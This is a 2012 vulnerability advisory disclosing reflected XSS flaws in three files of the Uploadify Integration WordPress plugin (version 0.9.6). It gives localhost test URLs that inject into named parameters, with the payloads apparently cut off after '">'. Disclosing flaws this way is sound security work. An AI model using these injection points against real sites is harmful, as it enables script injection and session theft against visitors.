[waraxe-2012-SA#085] - Reflected XSS in Uploadify Integration Wordpress plugin =============================================================================== Author: Janek Vind "waraxe" Date: 06. April 2012 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-85.html Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Uploadify Integration allows you to insert a jQuery uploadify uploader into your forms. Features: Uses jQuery Uploadify, Automatically saves to post meta, user meta, an option, or temporary depending on the metaType selected by the shortcode. Allows more than one shortcode per page. http://wordpress.org/extend/plugins/uploadify-integration/ Vulnerable versions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Affected is Uploadify Integration 0.9.6, older versions may be affected as well. ############################################################################### 1. Reflected XSS vulnerability in "views/scripts/shortcode/index.php" ############################################################################### Reason: outputting html data without proper encoding Attack vector: user submitted GET or POST parameters Preconditions: "register_globals=On" Result: XSS attack possibilities Tests: http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?inputname="> http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?buttontext="> http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?filetypeexts="> http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?filetypedesc="> http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?filesizelimit="> http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?uploadmode="> http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?metatype="> http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?parentid="> http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?path="> http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/ shortcode/index.php?url="> Result: XSS payload execution can be observed ############################################################################### 2. Reflected XSS vulnerability in "views/scripts/partials/file.php" ############################################################################### Reason: outputting html data without proper encoding Attack vector: user submitted GET or POST parameters Preconditions: "register_globals=On" Result: XSS attack possibilities Tests: http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/ partials/file.php?fileid="> http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/ partials/file.php?inputname="> Result: XSS payload execution can be observed ############################################################################### 3. Reflected XSS vulnerability in "views/scripts/file/error.php" ############################################################################### Reason: outputting html data without proper encoding Attack vector: user submitted GET or POST parameters Preconditions: "register_globals=On" Result: XSS attack possibilities Tests: http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/ file/error.php?error="> Result: XSS payload execution can be observed Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe@yahoo.com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ ---------------------------------- [ EOF ] ------------------------------------